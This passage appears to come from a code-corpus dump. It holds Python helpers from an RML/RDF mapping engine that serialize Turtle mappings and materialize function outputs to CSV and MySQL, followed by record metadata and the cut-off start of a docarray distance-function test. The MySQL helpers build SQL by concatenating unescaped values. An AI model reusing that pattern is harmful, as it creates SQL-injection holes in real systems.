def condreplace(value, value1, value2, replvalue1, replvalue2):
if (value == 1):
value = replvalue1
elif (value == 0):
value = replvalue2
return value
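# Heuristically split a URI into (prefix, namespace URL, local value): hash
# namespaces are matched against a fixed list of known vocabularies, while
# slash namespaces fall back to the second-to-last path segment as prefix.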
def prefix_extraction(uri):
prefix = ""
url = ""
value = ""
if "#" in uri:
if "ru" in uri:
prefix = "ru"
elif "rdf-schema" in uri:
prefix = "rdfs"
elif "rdf-syntax-ns" in uri:
prefix = "rdf"
elif "rev" in uri:
prefix = "rev"
elif "owl" in uri:
prefix = "owl"
elif "fnml" in uri:
prefix = "fnml"
elif "function" in uri:
prefix = "fno"
elif "XML" in uri:
prefix = "xsd"
elif "journey" in uri:
prefix = "tmjourney"
elif "commons" in uri:
prefix = "tmcommons"
elif "organisations" in uri:
prefix = "tmorg"
url, value = uri.split("#")[0]+"#", uri.split("#")[1]
else:
if "resource" in uri:
prefix = "sio"
elif "af" in uri:
prefix = "af"
elif "example" in uri:
prefix = "ex"
elif "term" in uri:
prefix = "dcterms"
elif "elements" in uri:
prefix = "dce"
elif "iasis" in uri:
prefix = "iasis"
else:
prefix = uri.split("/")[len(uri.split("/"))-2]
if "." in prefix:
prefix = prefix.split(".")[0]
value = uri.split("/")[len(uri.split("/"))-1]
char = ""
temp = ""
temp_string = uri
while char != "/":
temp = temp_string
temp_string = temp_string[:-1]
char = temp[len(temp)-1]
url = temp
return prefix, url, value
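# Serialize the parsed mapping back to Turtle after function evaluation:
# function triples maps are skipped, and "reference function" object maps are
# rewritten either as a join against the materialized function output (join
# mode) or as a direct rml:reference to the output column.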
def update_mapping(triple_maps, dic, output, original, join, data_source):
mapping = ""
for triples_map in triple_maps:
if triples_map.function:
pass
else:
if "#" in triples_map.triples_map_id:
mapping += "<#" + triples_map.triples_map_id.split("#")[1] + ">\n"
else:
mapping += "<#" + triples_map.triples_map_id + ">\n"
mapping += " a rr:TriplesMap;\n"
if data_source:
mapping += " rml:logicalSource [ rml:source \"" + data_source[triples_map.triples_map_id] +"\";\n"
else:
mapping += " rml:logicalSource [ rml:source \"" + triples_map.data_source +"\";\n"
if str(triples_map.file_format).lower() == "csv" and triples_map.query == "None":
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if triples_map.subject_map.subject_mapping_type is "template":
mapping += " rr:template \"" + triples_map.subject_map.value + "\";\n"
elif triples_map.subject_map.subject_mapping_type is "reference":
mapping += " rml:reference " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "constant":
mapping += " rr:constant " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "function":
mapping = mapping[:-2]
mapping += "<" + triples_map.subject_map.value + ">;\n"
if triples_map.subject_map.rdf_class is not None:
prefix, url, value = prefix_extraction(triples_map.subject_map.rdf_class)
mapping += " rr:class " + prefix + ":" + value + "\n"
mapping += " ];\n"
for predicate_object in triples_map.predicate_object_maps_list:
mapping += " rr:predicateObjectMap [\n"
if "constant" in predicate_object.predicate_map.mapping_type :
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "constant shortcut" in predicate_object.predicate_map.mapping_type:
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "template" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rr:template \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
elif "reference" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rml:reference \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
mapping += " rr:objectMap "
if "constant" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "template" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:template \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference" == predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rml:reference \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "parent triples map function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child <" + predicate_object.object_map.child + ">;\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map parent function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map child function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">\n"
if (predicate_object.object_map.child is not None) and (predicate_object.object_map.parent is not None):
mapping = mapping[:-1]
mapping += ";\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent \"" + predicate_object.object_map.parent + "\";\n"
mapping += " ]\n"
mapping += " ]\n"
elif "constant shortcut" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference function" in predicate_object.object_map.mapping_type:
if join:
mapping += "[\n"
mapping += " rr:parentTriplesMap <#" + dic[predicate_object.object_map.value]["output_name"] + ">;\n"
for attr in dic[predicate_object.object_map.value]["inputs"]:
if attr[1] != "constant":
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + attr[0] + "\";\n"
mapping += " rr:parent \"" + attr[0] +"\";\n"
mapping += " ];\n"
mapping += " ];\n"
else:
mapping += "[\n"
mapping += " rml:reference \"" + dic[predicate_object.object_map.value]["output_name"] + "\";\n"
mapping += " ];\n"
mapping += " ];\n"
if triples_map.function:
pass
else:
mapping = mapping[:-2]
mapping += ".\n\n"
if join:
for function in dic.keys():
mapping += "<#" + dic[function]["output_name"] + ">\n"
mapping += " a rr:TriplesMap;\n"
mapping += " rml:logicalSource [ rml:source \"" + dic[function]["output_file"] +"\";\n"
if "csv" in dic[function]["output_file"]:
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if dic[function]["termType"]:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\";\n"
mapping += " rr:termType rr:IRI\n"
else:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\"\n"
mapping += " ].\n\n"
prefix_string = ""
f = open(original,"r")
original_mapping = f.readlines()
for prefix in original_mapping:
if ("prefix" in prefix) or ("base" in prefix):
prefix_string += prefix
else:
break
f.close()
prefix_string += "\n"
prefix_string += mapping
mapping_file = open(output + "/transfered_mapping.ttl","w")
mapping_file.write(prefix_string)
mapping_file.close()
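# Same serialization as update_mapping, but for relational sources: the
# logical source points at <DB_source> with rr:tableName / rml:query, and the
# D2RQ connection details are copied over from the original mapping file.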
def update_mapping_rdb(triple_maps, dic, output, original, join, data_source):
mapping = ""
for triples_map in triple_maps:
if triples_map.function:
pass
else:
if "#" in triples_map.triples_map_id:
mapping += "<#" + triples_map.triples_map_id.split("#")[1] + ">\n"
else:
mapping += "<#" + triples_map.triples_map_id + ">\n"
mapping += " a rr:TriplesMap;\n"
if data_source:
mapping += " rml:logicalSource [ rml:source <DB_source>;\n"
mapping += " rr:tableName \"" + data_source[triples_map.triples_map_id] + "\";\n"
else:
mapping += " rml:logicalSource [ rml:source <DB_source>;\n"
mapping += " rr:tableName \"" + triples_map.tablename + "\";\n"
if triples_map.query != "None":
mapping += " rml:query \"" + triples_map.query +"\"\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if triples_map.subject_map.subject_mapping_type == "template":
mapping += " rr:template \"" + triples_map.subject_map.value + "\";\n"
elif triples_map.subject_map.subject_mapping_type is "reference":
mapping += " rml:reference " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "constant":
mapping += " rr:constant " + triples_map.subject_map.value + ";\n"
elif triples_map.subject_map.subject_mapping_type is "function":
mapping = mapping[:-2]
mapping += "<" + triples_map.subject_map.value + ">;\n"
if triples_map.subject_map.rdf_class is not None:
prefix, url, value = prefix_extraction(triples_map.subject_map.rdf_class)
mapping += " rr:class " + prefix + ":" + value + "\n"
mapping += " ];\n"
for predicate_object in triples_map.predicate_object_maps_list:
mapping += " rr:predicateObjectMap [\n"
if "constant" in predicate_object.predicate_map.mapping_type :
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "constant shortcut" in predicate_object.predicate_map.mapping_type:
prefix, url, value = prefix_extraction(predicate_object.predicate_map.value)
mapping += " rr:predicate " + prefix + ":" + value + ";\n"
elif "template" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rr:template \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
elif "reference" in predicate_object.predicate_map.mapping_type:
mapping += " rr:predicateMap[\n"
mapping += " rml:reference \"" + predicate_object.predicate_map.value + "\"\n"
mapping += " ];\n"
mapping += " rr:objectMap "
if "constant" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "template" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:template \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference" == predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rml:reference \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "parent triples map function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child <" + predicate_object.object_map.child + ">;\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map parent function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map child function" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">;\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent <" + predicate_object.object_map.parent + ">;\n"
mapping += " ]\n"
elif "parent triples map" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:parentTriplesMap <" + predicate_object.object_map.value + ">\n"
if (predicate_object.object_map.child is not None) and (predicate_object.object_map.parent is not None):
mapping = mapping[:-1]
mapping += ";\n"
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + predicate_object.object_map.child + "\";\n"
mapping += " rr:parent \"" + predicate_object.object_map.parent + "\";\n"
mapping += " ]\n"
mapping += " ]\n"
elif "constant shortcut" in predicate_object.object_map.mapping_type:
mapping += "[\n"
mapping += " rr:constant \"" + predicate_object.object_map.value + "\"\n"
mapping += " ]\n"
elif "reference function" in predicate_object.object_map.mapping_type:
if join:
mapping += "[\n"
mapping += " rr:parentTriplesMap <#" + dic[predicate_object.object_map.value]["output_name"] + ">;\n"
for attr in dic[predicate_object.object_map.value]["inputs"]:
if attr[1] != "constant":
mapping += " rr:joinCondition [\n"
mapping += " rr:child \"" + attr[0] + "\";\n"
mapping += " rr:parent \"" + attr[0] +"\";\n"
mapping += " ];\n"
mapping += " ];\n"
else:
mapping += "[\n"
mapping += " rml:reference \"" + dic[predicate_object.object_map.value]["output_name"] + "\";\n"
mapping += " ];\n"
mapping += " ];\n"
if triples_map.function:
pass
else:
mapping = mapping[:-2]
mapping += ".\n\n"
if join:
for function in dic.keys():
mapping += "<#" + dic[function]["output_name"] + ">\n"
mapping += " a rr:TriplesMap;\n"
mapping += " rml:logicalSource [ rml:source \"" + dic[function]["output_file"] +"\";\n"
if "csv" in dic[function]["output_file"]:
mapping += " rml:referenceFormulation ql:CSV\n"
mapping += " ];\n"
mapping += " rr:subjectMap [\n"
if dic[function]["termType"]:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\";\n"
mapping += " rr:termType rr:IRI\n"
else:
mapping += " rml:reference \"" + dic[function]["output_name"] + "\"\n"
mapping += " ].\n\n"
prefix_string = ""
db_source = "<#DB_source> a d2rq:Database;\n"
f = open(original,"r")
original_mapping = f.readlines()
for prefix in original_mapping:
if "prefix;" in prefix or "d2rq:Database;" in prefix:
pass
elif ("prefix" in prefix) or ("base" in prefix):
prefix_string += prefix
elif "jdbcDSN" in prefix:
db_source += prefix
elif "jdbcDriver" in prefix:
db_source += prefix
elif "d2rq:username" in prefix:
db_source += prefix
elif "d2rq:password" in prefix:
db_source += prefix
f.close()
prefix_string += "\n"
prefix_string += mapping
prefix_string += db_source
mapping_file = open(output + "/transfered_mapping.ttl","w")
mapping_file.write(prefix_string)
mapping_file.close()
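# Dispatch one row through the transformation named in dic["function"],
# reading parameters from dic["func_par"]. A minimal sketch of the expected
# shape, inferred from the call sites in this file (keys vary per function):
#
#   dic = {"function": "tolower",           # or a URI containing "tolower"
#          "func_par": {"value": "name"}}   # column holding the input value
#   execute_function({"name": "ABC"}, dic)  # -> "abc"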
def execute_function(row,dic):
if "tolower" in dic["function"]:
return tolower(row[dic["func_par"]["value"]])
elif "toupper" in dic["function"]:
return toupper(row[dic["func_par"]["value"]])
elif "totitle" in dic["function"]:
return totitle(row[dic["func_par"]["value"]])
elif "trim" in dic["function"]:
return trim(row[dic["func_par"]["value"]])
elif "chomp" in dic["function"]:
return chomp(row[dic["func_par"]["value"]],dic["func_par"]["toremove"])
elif "substring" in dic["function"]:
if "index2" in dic["func_par"].keys():
return substring(row[dic["func_par"]["value"]],dic["func_par"]["index1"],dic["func_par"]["index2"])
else:
return substring(row[dic["func_par"]["value"]],dic["func_par"]["index1"],None)
elif "replaceValue" in dic["function"]:
return replaceValue(row[dic["func_par"]["value"]],dic["func_par"]["value2"],dic["func_par"]["value3"])
elif "match" in dic["function"]:
return match(row[dic["func_par"]["value"]], dic["func_par"]["regex"])
elif "variantIdentifier" in dic["function"]:
return variantIdentifier(row[dic["func_par"]["column1"]],row[dic["func_par"]["column2"]],dic["func_par"]["prefix"])
elif "condreplace" in dic["function"]:
return condreplace(row[dic["func_par"]["value"]],dic["func_par"]["value1"],dic["func_par"]["value2"],dic["func_par"]["replvalue1"],dic["func_par"]["replvalue2"])
else:
print("Invalid function")
print("Aborting...")
sys.exit(1)
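# Same dispatch as execute_function, but rows arrive as positional tuples
# from a MySQL cursor, so columns are resolved via header.index(...).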
def execute_function_mysql(row,header,dic):
if "tolower" in dic["function"]:
return tolower(row[header.index(dic["func_par"]["value"])])
elif "toupper" in dic["function"]:
return toupper(row[header.index(dic["func_par"]["value"])])
elif "totitle" in dic["function"]:
return totitle(row[header.index(dic["func_par"]["value"])])
elif "trim" in dic["function"]:
return trim(row[header.index(dic["func_par"]["value"])])
elif "chomp" in dic["function"]:
return chomp(row[header.index(dic["func_par"]["value"])],dic["func_par"]["toremove"])
elif "substring" in dic["function"]:
if "index2" in dic["func_par"].keys():
return substring(row[header.index(dic["func_par"]["value"])],dic["func_par"]["index1"],dic["func_par"]["index2"])
else:
return substring(row[header.index(dic["func_par"]["value"])],dic["func_par"]["index1"],None)
elif "replaceValue" in dic["function"]:
return replaceValue(row[header.index(dic["func_par"]["value"])],dic["func_par"]["value2"],dic["func_par"]["value3"])
elif "match" in dic["function"]:
return match(row[header.index(dic["func_par"]["value"])], dic["func_par"]["regex"])
elif "variantIdentifier" in dic["function"]:
return variantIdentifier(row[header.index(dic["func_par"]["column1"])],row[header.index(dic["func_par"]["column2"])],dic["func_par"]["prefix"])
elif "condreplace" in dic["function"]:
return condreplace(row[header.index(dic["func_par"]["value"])],dic["func_par"]["value1"],dic["func_par"]["value2"],dic["func_par"]["replvalue1"],dic["func_par"]["replvalue2"])
else:
print("Invalid function")
print("Aborting...")
sys.exit(1)
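# Materialize a function's output as <output>/<output_name>.csv: read only
# the non-constant input columns, evaluate the function once per distinct
# input (memoized in `values`), and cache the projected input rows in the
# module-level `columns` dict so a repeated function over the same columns
# skips re-reading the source.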
def join_csv(source, dic, output):
with open(output + "/" + dic["output_name"] + ".csv", "w") as temp_csv:
writer = csv.writer(temp_csv, quoting=csv.QUOTE_ALL)
keys = []
for attr in dic["inputs"]:
if attr[1] != "constant":
keys.append(attr[0])
values = {}
global columns
if "variantIdentifier" in dic["function"]:
if dic["func_par"]["column1"]+dic["func_par"]["column2"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]]:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] != "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["column1"]]+row[dic["func_par"]["column2"]]] = value
projection.append({dic["func_par"]["column1"]:row[dic["func_par"]["column1"]], dic["func_par"]["column2"]:row[dic["func_par"]["column2"]]})
columns[dic["func_par"]["column1"]+dic["func_par"]["column2"]] = projection
else:
if dic["func_par"]["value"] in columns:
keys.append(dic["output_name"])
writer.writerow(keys)
for row in columns[dic["func_par"]["value"]]:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
else:
reader = pd.read_csv(source, usecols=keys)
reader = reader.where(pd.notnull(reader), None)
reader = reader.to_dict(orient='records')
keys.append(dic["output_name"])
writer.writerow(keys)
projection = []
for row in reader:
if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
value = execute_function(row,dic)
line = []
for attr in dic["inputs"]:
if attr[1] is not "constant":
line.append(row[attr[0]])
line.append(value)
writer.writerow(line)
values[row[dic["func_par"]["value"]]] = value
projection.append({dic["func_par"]["value"]:row[dic["func_par"]["value"]]})
columns[dic["func_par"]["value"]] = projection
def join_csv_URI(source, dic, output):
    # Body mirrors join_csv; kept as a separate function in the original,
    # apparently for URI-valued outputs.
    with open(output + "/" + dic["output_name"] + ".csv", "w") as temp_csv:
        writer = csv.writer(temp_csv, quoting=csv.QUOTE_ALL)
        keys = []
        for attr in dic["inputs"]:
            if attr[1] != "constant":
                keys.append(attr[0])
        values = {}
        global columns
        if "variantIdentifier" in dic["function"]:
            if dic["func_par"]["column1"] + dic["func_par"]["column2"] in columns:
                keys.append(dic["output_name"])
                writer.writerow(keys)
                for row in columns[dic["func_par"]["column1"] + dic["func_par"]["column2"]]:
                    if (row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]] is not None):
                        value = execute_function(row, dic)
                        line = []
                        for attr in dic["inputs"]:
                            if attr[1] != "constant":
                                line.append(row[attr[0]])
                        line.append(value)
                        writer.writerow(line)
                        values[row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]]] = value
            else:
                reader = pd.read_csv(source, usecols=keys)
                reader = reader.where(pd.notnull(reader), None)
                reader = reader.to_dict(orient='records')
                keys.append(dic["output_name"])
                writer.writerow(keys)
                projection = []
                for row in reader:
                    if (row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]] not in values) and (row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]] is not None):
                        value = execute_function(row, dic)
                        line = []
                        for attr in dic["inputs"]:
                            if attr[1] != "constant":
                                line.append(row[attr[0]])
                        line.append(value)
                        writer.writerow(line)
                        values[row[dic["func_par"]["column1"]] + row[dic["func_par"]["column2"]]] = value
                        projection.append({dic["func_par"]["column1"]: row[dic["func_par"]["column1"]], dic["func_par"]["column2"]: row[dic["func_par"]["column2"]]})
                columns[dic["func_par"]["column1"] + dic["func_par"]["column2"]] = projection
        else:
            if dic["func_par"]["value"] in columns:
                keys.append(dic["output_name"])
                writer.writerow(keys)
                for row in columns[dic["func_par"]["value"]]:
                    if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
                        value = execute_function(row, dic)
                        line = []
                        for attr in dic["inputs"]:
                            if attr[1] != "constant":
                                line.append(row[attr[0]])
                        line.append(value)
                        writer.writerow(line)
                        values[row[dic["func_par"]["value"]]] = value
            else:
                reader = pd.read_csv(source, usecols=keys)
                reader = reader.where(pd.notnull(reader), None)
                reader = reader.to_dict(orient='records')
                keys.append(dic["output_name"])
                writer.writerow(keys)
                projection = []
                for row in reader:
                    if (row[dic["func_par"]["value"]] not in values) and (row[dic["func_par"]["value"]] is not None):
                        value = execute_function(row, dic)
                        line = []
                        for attr in dic["inputs"]:
                            if attr[1] != "constant":
                                line.append(row[attr[0]])
                        line.append(value)
                        writer.writerow(line)
                        values[row[dic["func_par"]["value"]]] = value
                        projection.append({dic["func_par"]["value"]: row[dic["func_par"]["value"]]})
                columns[dic["func_par"]["value"]] = projection
def create_dictionary(triple_map):
    # Flattens a triples map into {predicate_local_name: object_value} plus an
    # "inputs" list of [value, mapping_type] pairs used by the join functions.
    dic = {}
    inputs = []
    for tp in triple_map.predicate_object_maps_list:
        if "#" in tp.predicate_map.value:
            key = tp.predicate_map.value.split("#")[1]
            tp_type = tp.predicate_map.mapping_type
        elif "/" in tp.predicate_map.value:
            key = tp.predicate_map.value.split("/")[-1]
            tp_type = tp.predicate_map.mapping_type
        if "constant" in tp.object_map.mapping_type:
            value = tp.object_map.value
            tp_type = tp.object_map.mapping_type
        elif "#" in tp.object_map.value:
            value = tp.object_map.value.split("#")[1]
            tp_type = tp.object_map.mapping_type
        elif "/" in tp.object_map.value:
            value = tp.object_map.value.split("/")[-1]
            tp_type = tp.object_map.mapping_type
        else:
            value = tp.object_map.value
            tp_type = tp.object_map.mapping_type
        dic.update({key: value})
        if (key != "executes") and ([value, tp_type] not in inputs):
            inputs.append([value, tp_type])
    dic["inputs"] = inputs
    return dic
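# Illustrative sketch (an assumption about typical mapping shapes, not taken
# from the original source): for a predicate-object list whose "#executes"
# predicate points at a function named toLower plus one template input whose
# local name is "value" -> "name", create_dictionary would return roughly
#
#   {"executes": "toLower", "value": "name",
#    "inputs": [["name", "template"]]}
#
# "executes" is kept in the dict but deliberately excluded from "inputs".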
def join_mysql(data, header, dic, db):
    # Same materialization as join_csv, but the derived column is written into
    # a MySQL table instead of a CSV file.
    values = {}
    cursor = db.cursor(buffered=True)
    create = "CREATE TABLE " + dic["output_file"] + " ( "
    if "variantIdentifier" in dic["function"]:
        create += "`" + dic["func_par"]["column1"] + "` varchar(300),\n"
        create += "`" + dic["func_par"]["column2"] + "` varchar(300),\n"
    else:
        create += "`" + dic["func_par"]["value"] + "` varchar(300),\n"
    create += "`" + dic["output_name"] + "` varchar(300));"
    cursor.execute(create)
    if "variantIdentifier" in dic["function"]:
        for row in data:
            if (row[header.index(dic["func_par"]["column1"])] + row[header.index(dic["func_par"]["column2"])] not in values) and (row[header.index(dic["func_par"]["column1"])] + row[header.index(dic["func_par"]["column2"])] is not None):
                value = execute_function_mysql(row, header, dic)
                line = "INSERT INTO " + dic["output_file"] + "\n"
                line += "VALUES ("
                for attr in dic["inputs"]:
                    if attr[1] != "constant":
                        line += "'" + row[header.index(attr[0])] + "', "
                line += "'" + value + "');"
                cursor.execute(line)
                values[row[header.index(dic["func_par"]["column1"])] + row[header.index(dic["func_par"]["column2"])]] = value
    else:
        for row in data:
            if (row[header.index(dic["func_par"]["value"])] not in values) and (row[header.index(dic["func_par"]["value"])] is not None):
                value = execute_function_mysql(row, header, dic)
                line = "INSERT INTO " + dic["output_file"] + "\n"
                line += "VALUES ("
                for attr in dic["inputs"]:
                    if attr[1] != "constant":
                        line += "'" + row[header.index(attr[0])] + "', "
                line += "'" + value + "');"
                cursor.execute(line)
                values[row[header.index(dic["func_par"]["value"])]] = value
def translate_sql(triples_map):
    # Collects every template placeholder referenced by a triples map and
    # builds a SELECT DISTINCT query over those columns.
    query_list = []
    proyections = []
    if "{" in triples_map.subject_map.value:
        subject = triples_map.subject_map.value
        count = count_characters(subject)
        if (count == 1) and (subject.split("{")[1].split("}")[0] not in proyections):
            subject = subject.split("{")[1].split("}")[0]
            if "[" in subject:
                subject = subject.split("[")[0]
            proyections.append(subject)
        elif count > 1:
            subject_list = subject.split("{")
            for s in subject_list:
                if "}" in s:
                    subject = s.split("}")[0]
                    if "[" in subject:
                        subject = subject.split("[")[0]  # [0] was missing; split() alone yields a list
                    if subject not in proyections:
                        proyections.append(subject)
    for po in triples_map.predicate_object_maps_list:
        if "{" in po.object_map.value:
            count = count_characters(po.object_map.value)
            if 0 < count <= 1:
                predicate = po.object_map.value.split("{")[1].split("}")[0]
                if "[" in predicate:
                    predicate = predicate.split("[")[0]
                if predicate not in proyections:
                    proyections.append(predicate)
            elif 1 < count:
                predicate = po.object_map.value.split("{")
                for po_e in predicate:
                    if "}" in po_e:
                        pre = po_e.split("}")[0]
                        if "[" in pre:
                            pre = pre.split("[")[0]  # same missing-[0] fix as above
                        if pre not in proyections:
                            proyections.append(pre)
        elif "#" in po.object_map.value:
            pass
        elif "/" in po.object_map.value:
            pass
        else:
            predicate = po.object_map.value
            if "[" in predicate:
                predicate = predicate.split("[")[0]
            if predicate not in proyections:
                proyections.append(predicate)
        if po.object_map.child is not None:
            if po.object_map.child not in proyections:
                proyections.append(po.object_map.child)
    temp_query = "SELECT DISTINCT "
    for p in proyections:
        if p != "None":  # `is not` on a string literal compared identity, not value
            if p == proyections[-1]:
                temp_query += "`" + p + "`"
            else:
                temp_query += "`" + p + "`, "
        else:
            temp_query = temp_query[:-2]
    if triples_map.tablename != "None":
        temp_query = temp_query + " FROM " + triples_map.tablename + ";"
    else:
        temp_query = temp_query + " FROM " + triples_map.data_source + ";"
    query_list.append(temp_query)
    return triples_map.iterator, query_list
def count_characters(string):
    # Counts the "{" placeholder openers in a template string.
    count = 0
    for s in string:
        if s == "{":
            count += 1
    return count
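# Illustrative sketch (hypothetical mapping; names invented): for a triples map
# with subject template "http://example.com/person/{id}" over table Person and
# one object template "{name}", translate_sql would return something like
#
#   (iterator, ["SELECT DISTINCT `id`, `name` FROM Person;"])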
[record stats] avg_line_length: 47.98818 | max_line_length: 233 | alphanum_fraction: 0.496084 | (remaining per-record quality-signal columns omitted)

hexsha: ab55fc824a6febdc37bb85b03443b686732faa6b | size: 2,937 | ext: py | lang: Python
path: tests/unit/math/distance/test_paddle.py | repo: startakovsky/docarray | head: 78dd3199d25b3e533cd09643b97359783c193397 | licenses: ["Apache-2.0"]
stars: 591 (2022-01-09T14:39:59.000Z to 2022-03-31T13:19:39.000Z) | issues: 210 (2022-01-10T07:59:29.000Z to 2022-03-31T14:49:18.000Z) | forks: 40 (2022-01-09T14:52:20.000Z to 2022-03-31T07:59:45.000Z)
content:
import numpy as np
import paddle
import pytest

from docarray.math.distance.paddle import cosine, euclidean, sqeuclidean


@pytest.mark.parametrize(
    'x_mat, y_mat, result',
    (
        (
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
            np.array([[1.192093e-07, 2.53681537e-02], [2.53681537e-02, 0]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            np.array([[1.192093e-07]]),
        ),
        (
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            paddle.to_tensor([[0, 0, 0]], dtype='float32'),
            np.array([[1]]),
        ),
        (
            paddle.to_tensor([[1, 2, 3]], dtype='float32'),
            paddle.to_tensor([[19, 53, 201]], dtype='float32'),
            np.array([[0.06788693]]),
        ),
    ),
)
def test_cosine(x_mat, y_mat, result):
    np.testing.assert_almost_equal(cosine(x_mat, y_mat), result, decimal=3)


@pytest.mark.parametrize(
    'x_mat, y_mat, result',
    (
        (
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
            paddle.to_tensor([[1, 2, 3], [4, 5, 6]], dtype='float32'),
